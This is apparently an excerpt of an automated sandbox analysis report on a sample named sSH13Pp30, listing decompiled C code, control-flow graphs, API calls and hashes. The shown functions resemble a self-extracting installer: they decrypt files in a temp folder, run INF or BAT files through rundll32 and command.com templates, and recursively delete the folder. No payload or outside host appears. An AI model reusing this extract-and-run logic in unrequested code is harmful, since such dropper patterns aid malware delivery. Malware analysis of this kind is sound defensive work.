                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1c1b
                                                                                                                                                                                                      0x000e1c1b
                                                                                                                                                                                                      0x000e1c20
                                                                                                                                                                                                      0x000e1c2c
                                                                                                                                                                                                      0x000e1c33
                                                                                                                                                                                                      0x000e1c38
                                                                                                                                                                                                      0x000e1c3a
                                                                                                                                                                                                      0x000e1c3a
                                                                                                                                                                                                      0x000e1c40
                                                                                                                                                                                                      0x000e1c4b
                                                                                                                                                                                                      0x000e1c4b
                                                                                                                                                                                                      0x000e1c5d
                                                                                                                                                                                                      0x000e1c61
                                                                                                                                                                                                      0x000e1dd4
                                                                                                                                                                                                      0x000e1dd4
                                                                                                                                                                                                      0x000e1dd6
                                                                                                                                                                                                      0x000e1ddb
                                                                                                                                                                                                      0x000e1ddc
                                                                                                                                                                                                      0x000e1dde
                                                                                                                                                                                                      0x000e1d64
                                                                                                                                                                                                      0x000e1d64
                                                                                                                                                                                                      0x000e1d67
                                                                                                                                                                                                      0x000e1d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1c67
                                                                                                                                                                                                      0x000e1c67
                                                                                                                                                                                                      0x000e1c6d
                                                                                                                                                                                                      0x000e1c72
                                                                                                                                                                                                      0x000e1c74
                                                                                                                                                                                                      0x000e1c74
                                                                                                                                                                                                      0x000e1c8e
                                                                                                                                                                                                      0x000e1c99
                                                                                                                                                                                                      0x000e1cc0
                                                                                                                                                                                                      0x000e1cf8
                                                                                                                                                                                                      0x000e1d07
                                                                                                                                                                                                      0x000e1d23
                                                                                                                                                                                                      0x000e1d09
                                                                                                                                                                                                      0x000e1d14
                                                                                                                                                                                                      0x000e1d1b
                                                                                                                                                                                                      0x000e1d1b
                                                                                                                                                                                                      0x000e1d2b
                                                                                                                                                                                                      0x000e1d2d
                                                                                                                                                                                                      0x000e1d2d
                                                                                                                                                                                                      0x000e1d38
                                                                                                                                                                                                      0x000e1d39
                                                                                                                                                                                                      0x000e1d46
                                                                                                                                                                                                      0x000e1cc2
                                                                                                                                                                                                      0x000e1cc2
                                                                                                                                                                                                      0x000e1ccc
                                                                                                                                                                                                      0x000e1cce
                                                                                                                                                                                                      0x000e1cce
                                                                                                                                                                                                      0x000e1cdb
                                                                                                                                                                                                      0x000e1ce6
                                                                                                                                                                                                      0x000e1cee
                                                                                                                                                                                                      0x000e1cee
                                                                                                                                                                                                      0x000e1e89
                                                                                                                                                                                                      0x000e1e91
                                                                                                                                                                                                      0x000e1e92
                                                                                                                                                                                                      0x000e1e94
                                                                                                                                                                                                      0x000e1e97
                                                                                                                                                                                                      0x000e1ea4
                                                                                                                                                                                                      0x000e1ea4
                                                                                                                                                                                                      0x000e1c61
                                                                                                                                                                                                      0x000e1c07
                                                                                                                                                                                                      0x000e1bd3
                                                                                                                                                                                                      0x000e1b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 000E1BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 000E1BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 000E1C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 000E1C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,000E1140,00000000,00000008,?), ref: 000E1CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 000E1D1B
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-2835489207
                                                                                                                                                                                                      • Opcode ID: b23e0568d7875ca5302575ba3143a622640f0be88d1cebe6eb23d9144089926e
                                                                                                                                                                                                      • Instruction ID: 8ee8346b2cc67dd97991b96d377cd021a6dfaab0ae3509bd3bc147b86259e351
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b23e0568d7875ca5302575ba3143a622640f0be88d1cebe6eb23d9144089926e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75A197B0A042C86FEB609B26CC44FEA73A9DB85310F1402A9F595F72C1DBB49EC5CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 450 e2f1d-e2f3d 451 e2f3f-e2f46 450->451 452 e2f6c-e2f73 call e5164 450->452 454 e2f5f-e2f66 call e3a3f 451->454 455 e2f48 call e51e5 451->455 460 e2f79-e2f80 call e55a0 452->460 461 e3041 452->461 454->452 454->461 462 e2f4d-e2f4f 455->462 460->461 468 e2f86-e2fbe GetSystemDirectoryA call e658a LoadLibraryA 460->468 464 e3043-e3053 call e6ce0 461->464 462->461 465 e2f55-e2f5d 462->465 465->452 465->454 472 e2ff7-e3004 FreeLibrary 468->472 473 e2fc0-e2fd4 GetProcAddress 468->473 474 e3006-e300c 472->474 475 e3017-e3024 SetCurrentDirectoryA 472->475 473->472 476 e2fd6-e2fee DecryptFileA 473->476 474->475 477 e300e call e621e 474->477 478 e3026-e303c call e44b9 call e6285 475->478 479 e3054-e305a 475->479 476->472 485 e2ff0-e2ff5 476->485 489 e3013-e3015 477->489 478->461 480 e305c call e3b26 479->480 481 e3065-e306c 479->481 491 e3061-e3063 480->491 487 e306e-e3075 call e256d 481->487 488 e307c-e3089 481->488 485->472 496 e307a 487->496 493 e308b-e3091 488->493 494 e30a1-e30a9 488->494 489->461 489->475 491->461 491->481 493->494 497 e3093 call e3ba2 493->497 499 e30ab-e30ad 494->499 500 e30b4-e30b7 494->500 496->488 504 e3098-e309a 497->504 499->500 501 e30af call e4169 499->501 500->464 501->500 504->461 505 e309c 504->505 505->494
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0xe8a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E000E5164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E000E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E000E55A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E000E658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0xea288("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0xe8a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0xe8a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0xe8d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0xe8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0xe9a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E000E256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0xe8a24; // 0x0
                                                                                                                                                                                                      									 *0xe9a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0xe8a38;
                                                                                                                                                                                                      										if( *0xe8a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E000E4169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0xe9a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E000E3BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0xe8a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E000E3B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E000E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0xe9124 = E000E6285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0xe9a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E000E621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0xe8a24;
                                                                                                                                                                                                      				if( *0xe8a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E000E3A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E000E51E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0xe8a38;
                                                                                                                                                                                                      				if( *0xe8a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x000e2f1d
                                                                                                                                                                                                      0x000e2f28
                                                                                                                                                                                                      0x000e2f2f
                                                                                                                                                                                                      0x000e2f3d
                                                                                                                                                                                                      0x000e2f6c
                                                                                                                                                                                                      0x000e2f6c
                                                                                                                                                                                                      0x000e2f71
                                                                                                                                                                                                      0x000e2f73
                                                                                                                                                                                                      0x000e3041
                                                                                                                                                                                                      0x000e3041
                                                                                                                                                                                                      0x000e3043
                                                                                                                                                                                                      0x000e3053
                                                                                                                                                                                                      0x000e3053
                                                                                                                                                                                                      0x000e2f79
                                                                                                                                                                                                      0x000e2f80
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2f86
                                                                                                                                                                                                      0x000e2f86
                                                                                                                                                                                                      0x000e2f93
                                                                                                                                                                                                      0x000e2f9e
                                                                                                                                                                                                      0x000e2fa0
                                                                                                                                                                                                      0x000e2fa6
                                                                                                                                                                                                      0x000e2fb8
                                                                                                                                                                                                      0x000e2fba
                                                                                                                                                                                                      0x000e2fbe
                                                                                                                                                                                                      0x000e2fc6
                                                                                                                                                                                                      0x000e2fcc
                                                                                                                                                                                                      0x000e2fd4
                                                                                                                                                                                                      0x000e2fd6
                                                                                                                                                                                                      0x000e2fd8
                                                                                                                                                                                                      0x000e2fe0
                                                                                                                                                                                                      0x000e2fe6
                                                                                                                                                                                                      0x000e2fee
                                                                                                                                                                                                      0x000e2ff0
                                                                                                                                                                                                      0x000e2ff5
                                                                                                                                                                                                      0x000e2ff5
                                                                                                                                                                                                      0x000e2fee
                                                                                                                                                                                                      0x000e2fd4
                                                                                                                                                                                                      0x000e2ff8
                                                                                                                                                                                                      0x000e2ffe
                                                                                                                                                                                                      0x000e3004
                                                                                                                                                                                                      0x000e3017
                                                                                                                                                                                                      0x000e301c
                                                                                                                                                                                                      0x000e3024
                                                                                                                                                                                                      0x000e3054
                                                                                                                                                                                                      0x000e305a
                                                                                                                                                                                                      0x000e3065
                                                                                                                                                                                                      0x000e3065
                                                                                                                                                                                                      0x000e306c
                                                                                                                                                                                                      0x000e306e
                                                                                                                                                                                                      0x000e3075
                                                                                                                                                                                                      0x000e307a
                                                                                                                                                                                                      0x000e307a
                                                                                                                                                                                                      0x000e307c
                                                                                                                                                                                                      0x000e3081
                                                                                                                                                                                                      0x000e3087
                                                                                                                                                                                                      0x000e3089
                                                                                                                                                                                                      0x000e30a1
                                                                                                                                                                                                      0x000e30a1
                                                                                                                                                                                                      0x000e30a9
                                                                                                                                                                                                      0x000e30ab
                                                                                                                                                                                                      0x000e30ad
                                                                                                                                                                                                      0x000e30af
                                                                                                                                                                                                      0x000e30af
                                                                                                                                                                                                      0x000e30ad
                                                                                                                                                                                                      0x000e30b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e308b
                                                                                                                                                                                                      0x000e308b
                                                                                                                                                                                                      0x000e3091
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3093
                                                                                                                                                                                                      0x000e3098
                                                                                                                                                                                                      0x000e309a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e309c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e309c
                                                                                                                                                                                                      0x000e3089
                                                                                                                                                                                                      0x000e305c
                                                                                                                                                                                                      0x000e3061
                                                                                                                                                                                                      0x000e3063
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3063
                                                                                                                                                                                                      0x000e302b
                                                                                                                                                                                                      0x000e3032
                                                                                                                                                                                                      0x000e303c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e303c
                                                                                                                                                                                                      0x000e3006
                                                                                                                                                                                                      0x000e300c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e300e
                                                                                                                                                                                                      0x000e3015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3015
                                                                                                                                                                                                      0x000e2f80
                                                                                                                                                                                                      0x000e2f3f
                                                                                                                                                                                                      0x000e2f46
                                                                                                                                                                                                      0x000e2f5f
                                                                                                                                                                                                      0x000e2f5f
                                                                                                                                                                                                      0x000e2f64
                                                                                                                                                                                                      0x000e2f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2f66
                                                                                                                                                                                                      0x000e2f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2f55
                                                                                                                                                                                                      0x000e2f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E2F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 000E2FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 000E2FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 000E2FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000E2FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E301C
                                                                                                                                                                                                        • Part of subcall function 000E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000E2F4D,?,00000002,00000000), ref: 000E5201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-2196669084
                                                                                                                                                                                                      • Opcode ID: a1c31566dbb461bf88e662cea3b895c015e94cd2a125b6041e45cc142ca0c0a9
                                                                                                                                                                                                      • Instruction ID: caee5014964f86b44252f9e93f96be5b1a090ed7298f4b92587c09f22530dea7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c31566dbb461bf88e662cea3b895c015e94cd2a125b6041e45cc142ca0c0a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A41DE31A002C58EFB70AB339D9D69A3BE89B54B50F044075EA15F7192EF78CE80C751
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 648 e2390-e23b3 649 e24cb-e24df call e6ce0 648->649 650 e23b9-e23bc 648->650 650->649 651 e23c2-e2401 call e1680 call e16b3 FindFirstFileA 650->651 651->649 658 e2407-e241f call e1680 651->658 661 e2479-e24a3 call e16b3 SetFileAttributesA DeleteFileA 658->661 662 e2421-e242f lstrcmpA 658->662 664 e24a9-e24b7 FindNextFileA 661->664 662->664 665 e2431-e2443 lstrcmpA 662->665 664->658 667 e24bd-e24c5 FindClose RemoveDirectoryA 664->667 665->664 668 e2445-e2477 call e16b3 call e658a call e2390 665->668 667->649 668->664
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E000E2390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E000E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E000E16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E000E1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E000E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                      								E000E16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                      								E000E658A( &_v280, 0x104, 0xe1140);
                                                                                                                                                                                                      								E000E2390( &_v284);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                      					FindClose(_t63); // executed
                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      0x000e2398
                                                                                                                                                                                                      0x000e239e
                                                                                                                                                                                                      0x000e23a3
                                                                                                                                                                                                      0x000e23a5
                                                                                                                                                                                                      0x000e23ae
                                                                                                                                                                                                      0x000e23b3
                                                                                                                                                                                                      0x000e24cb
                                                                                                                                                                                                      0x000e24d2
                                                                                                                                                                                                      0x000e24d3
                                                                                                                                                                                                      0x000e24d4
                                                                                                                                                                                                      0x000e24df
                                                                                                                                                                                                      0x000e23c2
                                                                                                                                                                                                      0x000e23d1
                                                                                                                                                                                                      0x000e23db
                                                                                                                                                                                                      0x000e23e4
                                                                                                                                                                                                      0x000e23f6
                                                                                                                                                                                                      0x000e23fc
                                                                                                                                                                                                      0x000e2401
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2407
                                                                                                                                                                                                      0x000e2407
                                                                                                                                                                                                      0x000e2408
                                                                                                                                                                                                      0x000e2411
                                                                                                                                                                                                      0x000e241f
                                                                                                                                                                                                      0x000e247a
                                                                                                                                                                                                      0x000e2483
                                                                                                                                                                                                      0x000e2495
                                                                                                                                                                                                      0x000e24a3
                                                                                                                                                                                                      0x000e2421
                                                                                                                                                                                                      0x000e242f
                                                                                                                                                                                                      0x000e2453
                                                                                                                                                                                                      0x000e245d
                                                                                                                                                                                                      0x000e2466
                                                                                                                                                                                                      0x000e2472
                                                                                                                                                                                                      0x000e2472
                                                                                                                                                                                                      0x000e242f
                                                                                                                                                                                                      0x000e24af
                                                                                                                                                                                                      0x000e24b5
                                                                                                                                                                                                      0x000e24be
                                                                                                                                                                                                      0x000e24c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e24c5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,000E8A3A,000E11F4,000E8A3A,00000000,?,?), ref: 000E23F6
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,000E11F8), ref: 000E2427
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,000E11FC), ref: 000E243B
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 000E2495
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 000E24A3
                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000E24AF
                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 000E24BE
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(000E8A3A), ref: 000E24C5
